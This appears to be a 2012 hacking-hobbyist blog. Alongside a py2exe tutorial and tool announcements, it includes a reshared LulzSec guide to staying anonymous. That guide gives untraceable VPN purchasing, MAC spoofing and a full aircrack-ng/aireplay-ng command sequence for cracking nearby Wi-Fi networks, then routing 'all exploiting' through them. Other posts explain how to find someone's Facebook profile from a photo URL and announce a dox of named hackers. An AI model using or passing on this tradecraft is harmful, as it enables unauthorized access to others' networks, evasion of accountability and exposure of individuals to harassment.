Saturday, March 31, 2012

convert python programs to standalone windows exe file

hi guys wassup i found a interesting thing that i would like to share as a python programmer
the program is py2exe as the name suggests it converts python files to an exe standalone file here is the method

Create your setup script (

py2exe extends Distutils with a new "command". If you've installed third party Python modules then there's a good chance you've seen at least one distutils command:

C:\Tutorial>python install
"install" is a Distutils command that installs something (typically a Python module or package). The details Distutils needs to do that installation are contained in (and sometimes other associated files).
"py2exe" is a new Distutils command that is added when you import py2exe. To use py2exe you need to create a file to tell Distutils and py2exe what you want to do. Here's a whose simplicity is appropriate for our sample program...

     from distutils.core import setup
     import py2exe
save it as and is your python filename 

Notice that this is ordinary Python. Let's go through it line by line...
  1. When working with py2exe the only part of Distutils we'll typically need to reference directly is the setup function, so that's all we'll import.
  2. Once Distutils is loaded, we need to load py2exe so that it can add its command.
  3. Whitespace is good!
  4. Call setup and tell it that we want a single console application and the main entry point is "".

Run your setup script

The next step is to run your setup script. Make sure to give the py2exe command and expect to see lots and lots of output:
C:\Python27> python py2exe
running py2exe
creating C:\Python27\build
creating C:\Python27\build\bdist.win32
creating C:\Python27\build\bdist.win32\winexe
creating C:\Python27\build\bdist.win32\winexe\collect-2.7
creating C:\Python27\build\bdist.win32\winexe\bundle-2.7
creating C:\Python27\build\bdist.win32\winexe\temp
creating C:\Python27\dist
*** searching for required modules ***
*** parsing results ***
creating python loader for extension 'unicodedata' (C:\Python27\DLLs\unic
creating python loader for extension 'select' (C:\Python27\DLLs\
creating python loader for extension '_socket' (C:\Python27\DLLs\_socket.
creating python loader for extension '_hashlib' (C:\Python27\DLLs\_hashli
creating python loader for extension '_ssl' (C:\Python27\DLLs\_ssl.pyd ->
creating python loader for extension 'bz2' (C:\Python27\DLLs\bz2.pyd -> b
*** finding dlls needed ***
*** create binaries ***
*** byte compile python files ***
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ to _
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ to _s
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ to _ssl.
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ to
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ to sel
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\ t
byte-compiling C:\Python27\lib\ to StringIO.pyc
byte-compiling C:\Python27\lib\ to UserDict.pyc
byte-compiling C:\Python27\lib\ to __future__.pyc
byte-compiling C:\Python27\lib\ to _abcoll.pyc
byte-compiling C:\Python27\lib\ to _strptime.pyc
byte-compiling C:\Python27\lib\ to
byte-compiling C:\Python27\lib\ to _weakrefset.pyc
byte-compiling C:\Python27\lib\ to abc.pyc
byte-compiling C:\Python27\lib\ to atexit.pyc
byte-compiling C:\Python27\lib\ to base64.pyc
byte-compiling C:\Python27\lib\ to bdb.pyc
byte-compiling C:\Python27\lib\ to bisect.pyc
byte-compiling C:\Python27\lib\ to calendar.pyc
byte-compiling C:\Python27\lib\ to cmd.pyc
byte-compiling C:\Python27\lib\ to codecs.pyc
byte-compiling C:\Python27\lib\ to collections.pyc
byte-compiling C:\Python27\lib\ to copy.pyc
byte-compiling C:\Python27\lib\ to copy_reg.pyc
byte-compiling C:\Python27\lib\ to difflib.pyc
byte-compiling C:\Python27\lib\ to dis.pyc
byte-compiling C:\Python27\lib\ to doctest.pyc
byte-compiling C:\Python27\lib\ to dummy_thread.pyc
byte-compiling C:\Python27\lib\email\ to email\__init__.pyc
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\email
byte-compiling C:\Python27\lib\email\ to email\
byte-compiling C:\Python27\lib\email\ to email\
byte-compiling C:\Python27\lib\email\ to email\charset.pyc
byte-compiling C:\Python27\lib\email\ to email\encoders.pyc
byte-compiling C:\Python27\lib\email\ to email\errors.pyc
byte-compiling C:\Python27\lib\email\ to email\
byte-compiling C:\Python27\lib\email\ to email\generator.pyc
byte-compiling C:\Python27\lib\email\ to email\header.pyc
byte-compiling C:\Python27\lib\email\ to email\iterators.pyc
byte-compiling C:\Python27\lib\email\ to email\message.pyc
byte-compiling C:\Python27\lib\email\mime\ to email\mime\__ini
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\email\mime
byte-compiling C:\Python27\lib\email\ to email\parser.pyc
byte-compiling C:\Python27\lib\email\ to email\
byte-compiling C:\Python27\lib\email\ to email\utils.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\__init_
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\encodings
byte-compiling C:\Python27\lib\encodings\ to encodings\aliases.
byte-compiling C:\Python27\lib\encodings\ to encodings\ascii.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\bas
byte-compiling C:\Python27\lib\encodings\ to encodings\big5.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\big5hk
byte-compiling C:\Python27\lib\encodings\ to encodings\bz2_co
byte-compiling C:\Python27\lib\encodings\ to encodings\charmap.
byte-compiling C:\Python27\lib\encodings\ to encodings\cp037.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\cp424.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp437.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp500.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp720.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp737.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp775.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp850.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp852.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp855.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp856.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp857.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp858.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp860.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp861.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp862.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp863.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp864.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp865.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp866.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp869.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp874.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp875.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp932.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp949.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\cp950.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\euc
byte-compiling C:\Python27\lib\encodings\ to encodings\euc
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\gb18030.
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\gbk.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\hex_co
byte-compiling C:\Python27\lib\encodings\ to encodings\hp_rom
byte-compiling C:\Python27\lib\encodings\ to encodings\hz.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\idna.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\iso20
byte-compiling C:\Python27\lib\encodings\ to encodings\iso
byte-compiling C:\Python27\lib\encodings\ to encodings\iso
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\iso
byte-compiling C:\Python27\lib\encodings\ to encodings\i
byte-compiling C:\Python27\lib\encodings\ to encodings\iso20
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso88
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\iso885
byte-compiling C:\Python27\lib\encodings\ to encodings\johab.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\latin_1.
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_a
byte-compiling C:\Python27\lib\encodings\ to encodings\mac
byte-compiling C:\Python27\lib\encodings\ to encodings\mac
byte-compiling C:\Python27\lib\encodings\ to encodings\mac
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_fa
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_gr
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_l
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_ro
byte-compiling C:\Python27\lib\encodings\ to encodings\mac
byte-compiling C:\Python27\lib\encodings\ to encodings\mac_
byte-compiling C:\Python27\lib\encodings\ to encodings\mbcs.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\ptcp154.
byte-compiling C:\Python27\lib\encodings\ to encodings\punycod
byte-compiling C:\Python27\lib\encodings\ to encodings\quo
byte-compiling C:\Python27\lib\encodings\ to encodin
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\shift_
byte-compiling C:\Python27\lib\encodings\ to encodings\s
byte-compiling C:\Python27\lib\encodings\ to encodings\s
byte-compiling C:\Python27\lib\encodings\ to encodings\st
byte-compiling C:\Python27\lib\encodings\ to encodings\tis_620.
byte-compiling C:\Python27\lib\encodings\ to encodings\undefi
byte-compiling C:\Python27\lib\encodings\ to encodings\u
byte-compiling C:\Python27\lib\encodings\ to encodings
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_16
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_16
byte-compiling C:\Python27\lib\encodings\ to encodings\
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_32
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_32
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_7.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_8.pyc
byte-compiling C:\Python27\lib\encodings\ to encodings\utf_8_
byte-compiling C:\Python27\lib\encodings\ to encodings\uu_code
byte-compiling C:\Python27\lib\encodings\ to encodings\zlib_
byte-compiling C:\Python27\lib\ to fnmatch.pyc
byte-compiling C:\Python27\lib\ to ftplib.pyc
byte-compiling C:\Python27\lib\ to functools.pyc
byte-compiling C:\Python27\lib\ to genericpath.pyc
byte-compiling C:\Python27\lib\ to getopt.pyc
byte-compiling C:\Python27\lib\ to getpass.pyc
byte-compiling C:\Python27\lib\ to gettext.pyc
byte-compiling C:\Python27\lib\ to hashlib.pyc
byte-compiling C:\Python27\lib\ to heapq.pyc
byte-compiling C:\Python27\lib\ to httplib.pyc
byte-compiling C:\Python27\lib\ to inspect.pyc
byte-compiling C:\Python27\lib\ to keyword.pyc
byte-compiling C:\Python27\lib\ to linecache.pyc
byte-compiling C:\Python27\lib\ to locale.pyc
byte-compiling C:\Python27\lib\logging\ to logging\
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\logging
byte-compiling C:\Python27\lib\ to mimetools.pyc
byte-compiling C:\Python27\lib\ to mimetypes.pyc
byte-compiling C:\Python27\lib\ to ntpath.pyc
byte-compiling C:\Python27\lib\ to nturl2path.pyc
byte-compiling C:\Python27\lib\ to opcode.pyc
byte-compiling C:\Python27\lib\ to optparse.pyc
byte-compiling C:\Python27\lib\ to os.pyc
byte-compiling C:\Python27\lib\ to os2emxpath.pyc
byte-compiling C:\Python27\lib\ to pdb.pyc
byte-compiling C:\Python27\lib\ to pickle.pyc
byte-compiling C:\Python27\lib\ to posixpath.pyc
byte-compiling C:\Python27\lib\ to pprint.pyc
byte-compiling C:\Python27\lib\ to quopri.pyc
byte-compiling C:\Python27\lib\ to random.pyc
byte-compiling C:\Python27\lib\ to re.pyc
byte-compiling C:\Python27\lib\ to repr.pyc
byte-compiling C:\Python27\lib\ to rfc822.pyc
byte-compiling C:\Python27\lib\ to shlex.pyc
byte-compiling C:\Python27\lib\ to socket.pyc
byte-compiling C:\Python27\lib\ to sre.pyc
byte-compiling C:\Python27\lib\ to sre_compile.pyc
byte-compiling C:\Python27\lib\ to sre_constants.pyc
byte-compiling C:\Python27\lib\ to sre_parse.pyc
byte-compiling C:\Python27\lib\ to ssl.pyc
byte-compiling C:\Python27\lib\ to stat.pyc
byte-compiling C:\Python27\lib\ to string.pyc
byte-compiling C:\Python27\lib\ to stringprep.pyc
byte-compiling C:\Python27\lib\ to struct.pyc
byte-compiling C:\Python27\lib\ to subprocess.pyc
byte-compiling C:\Python27\lib\ to tempfile.pyc
byte-compiling C:\Python27\lib\ to textwrap.pyc
byte-compiling C:\Python27\lib\ to threading.pyc
byte-compiling C:\Python27\lib\ to token.pyc
byte-compiling C:\Python27\lib\ to tokenize.pyc
byte-compiling C:\Python27\lib\ to traceback.pyc
byte-compiling C:\Python27\lib\ to types.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\__init__.
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\unittest
byte-compiling C:\Python27\lib\unittest\ to unittest\case.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\loader.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\main.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\result.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\runner.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\
byte-compiling C:\Python27\lib\unittest\ to unittest\suite.pyc
byte-compiling C:\Python27\lib\unittest\ to unittest\util.pyc
byte-compiling C:\Python27\lib\ to urllib.pyc
byte-compiling C:\Python27\lib\ to urlparse.pyc
byte-compiling C:\Python27\lib\ to uu.pyc
byte-compiling C:\Python27\lib\ to warnings.pyc
byte-compiling C:\Python27\lib\ to weakref.pyc
*** copy extensions ***
copying C:\Python27\DLLs\_hashlib.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\_socket.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\_ssl.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\bz2.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\select.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\unicodedata.pyd -> C:\Python27\dist
*** copy dlls ***
copying C:\Python27\w9xpopen.exe -> C:\Python27\dist
copying C:\WINDOWS\system32\python27.dll -> C:\Python27\dist
setting sys.winver for 'C:\Python27\dist\python27.dll' to 'py2exe'
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Python27\dist\
The following modules appear to be missing

*** binary dependencies ***
Your executable(s) also depend on these dlls which are not included,
you may or may not need to distribute them.

Make sure you have the license if you distribute any of them, and
make sure you don't distribute files belonging to the operating system.

   WS2_32.dll - C:\WINDOWS\system32\WS2_32.dll
   SHELL32.dll - C:\WINDOWS\system32\SHELL32.dll
   USER32.dll - C:\WINDOWS\system32\USER32.dll
   ADVAPI32.dll - C:\WINDOWS\system32\ADVAPI32.dll
   KERNEL32.dll - C:\WINDOWS\system32\KERNEL32.dll
Two directories will be created when you run your setup script, build and dist. The build directory is used as working space while your application is being packaged. It is safe to delete the build directory after your setup script has finished running. The files in the dist directory are the ones needed to run your application.

Test your executable

Now that the package has been created it is ready to test: (the exe file will be in dist folder)
C:\Tutorial>cd dist

Hello World
Excellent, it works!!!

Providing the Microsoft Visual C runtime DLL

The Python interpreter was compiled using Microsoft Visual C, so your new program needs the Microsoft Visual C runtime DLL to run. If you have installed appropriate versions of Python or Visual Studio, then you will already have this DLL on your computer. If some of your users might not already have this DLL, then they will not be able to run your program. The methods you may use to solve this depend on the version of Python you are using:

 Python 2.4 or 2.5

If you are using Python 2.4 or 2.5, then the DLL you need is called MSVCR71.dll. This DLL will probably already have been included in your dist directory, in which case you need do nothing more.
However, the copyright on this file is owned by Microsoft, and you need to check whether you have the legal right to redistribute it. If you have a copy of Visual Studio, check the file redist.txt provided within the installation to see whether you have redistribution rights for this DLL. Generally you have the right to redistribute it if you own a license for Microsoft Visual C++, but not if you use the Express Editions.
If you do not have the rights to redistribute MSVCR71.dll, then your users must install it for themselves, using the Microsoft Visual C++ 2005 Redistributable Package (vcredist_x86.exe).
Either you can instruct your users to download and run this themselves, or you could create an installer for your application (see Step 6 below), that includes vcredist_x86.exe (which is itself redistributable by anyone), and then run that as part of your application installation.

 Python 2.6, 2.7, 3.0, 3.1

For Python 2.6, the DLL you need is called MSVCR90.dll. Py2exe is not able to automatically include this DLL in your dist directory, so you must provide it yourself.
To complicate things, there is more than one version of this DLL in existance, each with the same filename. You need the same version that the Python interpreter was compiled with, which is version 9.0.21022.8. Through the remainder of these instructions, hover your mouse over the dll file (or the vcredist_x86.exe installer executable) to confirm which version you've got. You'll need the vcredist_x86.exe that contains the Microsoft Visual C++ 2008 Redistributable Package published 29-11-2007, so not the VS2008 SP1 one (tested with Python 2.7.1).
As for older versions of Python, you need to check redist.txt within your Visual Studio installation to see whether you have the legal right to redistribute this DLL. If you do have these rights, then you have the option to bundle the C runtime DLL with you application. If you don't have the rights, then you must have your users run the redistributable C runtime installer on their machines.

 Bundling the C runtime DLL

If you do have the rights to redistribute MSVCR90.dll, there should be a copy of it in your Visual Studio install, under VC\redist\x86\Microsoft.VC90.CRT. Since Visual Studio 2008, you can't just copy this DLL file - you also need the manifest file that you'll find there. The redist.txt file states that you must distribute all three dlls and the unmodified manifest file and it is a violation of the license agreement to distribute only one of the dlls without the others (though py2exe only needs MSVCR90.dll.) The pertinent passage from the redist.txt file is as follows:
  • "For your convenience, we have provided the following folders for use when redistributing VC++ runtime files. Subject to the license terms for the software, you may redistribute the folder (unmodified) in the application local folder as a sub-folder with no change to the folder name. You may also redistribute all the files (*.dll and *.manifest) within a folder, listed below the folder for your convenience, as an entire set."
You must make py2exe copy the three dlls and the manifest file into your project's dist directory, in a subdirectory called 'Microsoft.VC90.CRT'. To achieve this, add a data_files option to your project's
  from glob import glob
  data_files = [("Microsoft.VC90.CRT", glob(r'C:\Program Files\Microsoft Visual Studio 9.0\VC\redist\x86\Microsoft.VC90.CRT\*.*'))]
With this in place, running py2exe should put the files into your dist directory:
  | |
  | +-Microsoft.VC90.CRT.manifest
  | +-msvcm90.dll
  | +-msvcp90.dll
  | +-msvcr90.dll
Now, simply copying the whole dist directory to your users machines should now allow your application to run, even on machines that don't have their own copy of the C++ runtime.
Note that this method of including the C runtime is used by several Visual C++ applications - if you search your Program Files folder for msvcr90.dll, you may find several applications that have this DLL and the associated manifest bundled alongside their executable like this.
Also note that despite all the above, py2exe will complain that it cannot find MSVCP90.dll. You must edit your to add the path to the dlls to the sys.path, e.g.
    sys.path.append("C:\\Program Files\\Microsoft Visual Studio 9.0\\VC\\redist\\x86\\Microsoft.VC90.CRT")

win32ui special case

win32ui needs MFC DLLs to run .exe, see Py2exeAndWin32ui for extra informations

Running the redistributable C runtime installer

If you don't have rights to redistribute MSVCR90.dll, then your users may install it on their machine by running the Microsoft Visual C++ 2008 Redistributable Package (vcredist_x86.exe). It is important not to use the SP1 version of this installer, which contains the wrong version of MSVCR90.dll.
Either you can instruct  users to download and run this themselves, or you could create an installer for your application , that includes vcredist_x86.exe (which is itself redistributable by anyone), and then run that as part of your application installation.
The installer puts a copy of the DLLs in the directory C:\WINDOWS\WinSxS (XP), inside subdirectories with mangled names. The manifest file is in the 'Manifests' subdirectory, again this will have a mangled filename. You can still discern the text 'Microsoft.VC90.CRT' and '9.0.21022.8' within the mangled file and directory names, to find the files. It is possible to take a copy of these files and remove the filename mangling, to embed them in your application as described in 5.2.1.

6. Build an installer if applicable

py2exe is not an installer builder - it merely assembles the files needed to run your Python program. There are plenty of good installer builders out there including some that are open source (e.g., NSIS) and some that are free (e.g., Inno Setup).

Thursday, March 29, 2012

python program to get facebook users data

hi guys  after 3 days of python learning i wrote my first prgram which downloads a users info (public one) using graph API its very useful API

It can be accessed like this 
Users: (Bret Taylor)
Pages: (Coca-Cola page)
Events: (Facebook Developer Garage Austin)
Groups: (Facebook Developers group)
Applications: (the Graffiti app)
Status messages: (A status message from Bret)
Photos: (A photo from the Coca-Cola page)
Photo albums: (Coca-Cola's wall photos)
Profile pictures: (your profile picture)
Videos: (A Facebook tech talk on Graph API)
Notes: (Note announcing Facebook for iPhone 3.0)
Checkins: (Check-in at a pizzeria)
so just we need to put a ID after 
# -*- coding: utf-8 -*-
# Python
print                                             "##########################################"
print                                             "#  coded by Rjcrystal                                                 #"
print                                             "#                                     #"
print                                             "#  licensed under creative commons 2.5                      #"
print                                             "#,                               #"
print                                             "# put group,page,profile ID                                        #"
print                                             "##########################################"

from urllib import urlopen
s = raw_input('put ID,name,etc-->')
print urlopen("" + s).read()
so the problem with this is i am getting the result in 1 line only
and it adds extra' \' with every '/' but this is a great sucess for me :)
this will ask for a input just put your ID or anything to this and you will get all of its public INFO
have fun

Netsniff-NG High Performance Sniffer 0.5.6

netsniff-ng is a free, performant Linux networking toolkit. The gain of performance is reached by zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space and vice versa. For this purpose, the netsniff-ng toolkit is libpcap independent, but neverthelesssupports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. Furthermore, we are focussing on building a robust and clean analyzer and utilities that complete netsniff-ng asa support for network development, debugging or network reconnaissance. The netsniff-ng toolkit consists of the following utilities: *. netsniff-ng , a zero-copy analyzer, pcap capturer and replayer *. trafgen , a high-performance zero-copynetwork traffic generator *. bpfc , a Berkeley Packet Filter compiler supporting Linux extensions *. ifpps , a top-like kernel networking and system statistics tool *. flowtop , a top-like netfilter connection tracking tool *. curvetun , a lightweight multiuser IPtunnel based on elliptic curve cryptography *. ashunt , an Autonomous System (AS) trace route and ISP testing utility (Note: libpcap starting from 1.0.0 now also supports zero-copy, but for capturing only! netsniff-ng's pcap files can also be opened with tools like Wireshark , and vice versa!) download Git repository: git clone git:// Git web:

Monday, March 26, 2012

SQLMap Gui - Automatic SQL injection and database takeover tool

This is a awesome sqlmap python gui made by xcedz.To make it work get andinstall python 2.7 and download the last version of sqlMap-dev
svn checkout
after doing that download the gui scriptfrom :
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, toaccessing the underlying file system andexecuting commands on the operating system via out-of-band connections.
And here is Another Windows GUI forsqlmap written in C#
you have to enter the database parameters, select the table and column that you want to enumerate and press Exploit. SQL Map GUI will do the rest!
Honestly I recommend you python version because works better!
(Via the projectx blog official dev=>
p.s >this was not made by me

how to find someones profile ID from photo links

i know you have some idea that in deface pages people put their photo graphs with messages or sometimes if you wanna know who uploaded this photo to facebook then open the URL of image
then see the middle number for eg for this one etc
the highlighted one is our profile ID
then how to get info for that ID so we use facebook graph API so goto  then put what you got and yes you got the user info you can simply search him/her on facebook
and if you have a URL of photo with all facebook like,tag stuff then it will look like this so the highlighted portion is your ID


i am also thinking same about blogger and twitter any ideas what do you say guys
this also works for pages, and profiles only

Friday, March 23, 2012

how to be a Ghost on internet by lulzsec

Its a very interesting post by lulzec members i would like to share it

Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation: 7 Ultimate: 5 R1 VMWare: Live CD:

Required Hardware:
Virtualization supported CPU
USB wifi adapter supporting packet injection:

VPN Account without paper trail
  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins


Step One
  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab

Step Two
  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot

Step Three
  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot

Step Four
Install VMWare  

Step Five
  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:
  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID

Step Six
  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (

Step Seven
  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow instructions for TorBox
  • Open a browser and go to
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above

Step Eight
  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM

Step Nine
Encrypt All VM's
Open settings for Each VM in VMWare
Under Options > Enable Encryption
Set secure password

Torchat: OfflineE-mail:


SSL scanner SSLyze ver 0.4 released

Updated to ver 0.4
SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. Better, faster scanner to analyze the configuration of SSL servers.
*. Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, clientcertificates, and more…
*. Tested on Python 2.6 & 2.7 with Ubuntu and Windows 7, both 32 and64 bits. Might work on other platforms as well.
*. Based on OpenSSL and acustom SSL Python wrapper.
Official change log for SSLyze v0.4:
*. Support for OpenSSL 1.0.1 and TLS 1.1 and 1.2 scanning. See –tlsv1_1 and –tlsv1_2 .
*. Support for HTTP CONNECT proxies. See –https_tunnel .
*. Support for StartTLS with SMTP and XMPP. See –starttls .
*. Improved/clarified output.
*. Various bug fixes.

Download SSLyze:

Thursday, March 22, 2012

#OccupyOS linux for activists

Well this time i have found a modified version of tails linux (tor) for activists for occupy movements via OpPinkPower
occupyOS is a specialized Linux distribution designed to provide a secure environment activists can use to edit and publish documents, browse the web (manage site, twitter, and facebook pages), and securely communicate both on the ground and with the outside world. It was designed with security and usability in mind.
NOTE: occupyOS is still under heavy development and an official stable release has not been made.
Highlights include anonymous web browsing and internet access (using Tor or VPN's), encrypted voice chat and conferencing (using Mumble), encrypted instant messaging (with Pidgin-OTR and Xchat-OTR), advanced image editing (with GIMP), and a secure hard drive wiping tool. And many more
take care with this one als o play saf3

Saturday, March 17, 2012

BBHH hackers Doxed by mickey mouse

seems like there is someone else who is not happy with this india-bangladesh cyber war......
team mickey mouse Doxed all their infos online 
here is the D0x
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    Bangladesh BlackHat Hackers (pwnage for fun and profit)
          ... because we know how to LoL
  Team BBHH (ph33r u5):
    * Optimus BlackBurn
    * BD Xtor
    * Orions Hunter
    * Black Bone
